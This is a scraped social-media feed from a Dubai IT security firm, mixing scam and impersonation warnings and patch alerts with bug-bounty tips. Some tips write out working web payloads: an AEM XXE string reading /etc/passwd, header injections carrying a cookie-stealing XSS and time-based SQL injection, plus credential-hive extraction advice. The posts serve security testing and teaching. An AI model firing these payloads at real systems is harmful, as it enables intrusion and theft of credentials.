NXTL Solutions
@NXTLSolutions
Followers
14
Following
33
Media
7
Statuses
67
NXTLSolutions: Elevating your business with IT services, cybersecurity, AI, and digital solutions. Secure, innovate, and grow with cutting-edge tech. 🚀💡
Business Bay, Dubai, UAE
Joined October 2024
“Anderson Wilcox” Aliases/handles: @hackerwilcox (Telegram), @andersonwilcox_ (TikTok), nxtlsolution__ (Instagram impersonator), Linktree 2GC2GAQ5YRVEL1 Contact: +1 (304) 356-6831 (WhatsApp), h4ckerwilcox@gmail.com “pay after service” crypto/account “recovery” #SCAM #ALERT
0
0
0
WARNING: @nxtlsolution on X is a fraudulent account impersonating NXTL Solutions. We do NOT provide crypto recovery services or ask people to DM us for money. Please do not engage with him and be careful. #impersonation #SCAM #cryptofraud
0
0
0
A look-alike account and domain nxtlsolution(dot)com are impersonating #NXTLSolutions and using our logo. They are not affiliated with us. Please interact only with this account. Report any suspicious profiles or messages claiming to be NXTL. We’ve initiated takedown action.
0
0
0
[+] #BugbountyTip Take your time, Do Not Rush! Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips
2
13
166
[+] CVE-2024-34070 NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability > Froxlor leading to potential app compromise. #Bugbountytips #NXTLSolutions #bugbountytip
1
5
10
AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity
6
77
532
BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA https://t.co/HYp3M6zJQm
#Pentesting #CyberSecurity #Infosec
0
21
49
🔓 1.6 Million WordPress Logins - Data Leak Exposed A leak of 1.6 million WordPress login credentials, including usernames and passwords, has surfaced on the dark web. The compromised data increases the risk of unauthorized access to websites, identity theft, and potential
0
32
96
URLFinder has just landed in the Trickest Library 🚀 URLFinder brings high-speed, passive URL discovery tool to your custom automation workflows: 🔹 Passive source discovery 🔹 JSON/file/stdout output 🔹 Optimized speed & efficiency https://t.co/6FUDZALy8P
github.com
A high-speed tool for passively gathering URLs, optimized for efficient and comprehensive web asset discovery without active scanning. - projectdiscovery/urlfinder
0
25
93
Header based injection: X-Forwarded-Host: https://t.co/Dg6hCP2iQB"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:
8
92
524
pandora: A red team tool to extract credentials from password managers
meterpreter.org
pandora is a red team tool that assists in gathering credentials from different password managers. They are separated into three categories
3
155
627
#BugBountyTip #2: Filter Evasion Test with different encoding schemes for bypassing filters, such as using HTML entities (`<` for `<`), or testing with UTF-16 encodings. Encoding obfuscation can help when bypassing filters in certain contexts #BugBountyTips #NXTLSolutions
0
0
1
#BugBountyTip #1: When hunting for #XSS in single-page apps (SPAs), don’t just look at the front end. Check the app’s JavaScript frameworks for unprotected DOM manipulations and unsafe sanitization practices. #BugBountyTips #NXTLSolutions
0
0
1
Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity
1
2
8
[+] FIlter bypass techniques: Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;) #AEMSecurity #FilterBypass #bugbountytips #bugbountytip
4
20
148
[+] Using Google dorks for unique subdomains? Try this: site:*-*-*.yourtarget.com site:*-*.*.yourtarget.com site:*.*.*.yourtarget.com #bugbountytips
#bugbountytip
#AEMSecurity
1
5
22
Did you know that 7z can browse .VHD and .VMDK files? You can open them right up, and even directly browse ntfs filesystems. On a pentest and find a bunch of disk images? Copy the SAM/SECURITY/SYSTEM hives directly from the images, no mounting, copying, or fussing around.
63
427
3K
A 0-click pre-auth RCE (root) exploit was released on 27th October and is being actively exploited. If anyone is using LiteSpeed Cyberpanel that is publicly accessible right now, immediately upgrade it to the latest version 2.3.7 #NXTLSolutions #CyberSecurity #Cyberpanel
0
0
2
Beware of fake browser update prompts! Cybercriminals are using #WarmCookie malware to trick users into downloading malicious software. Verify updates only through official channels. Stay safe! #NXTLSolutions #OnlineSafety #MalwareAlert #CyberSecurity
0
0
0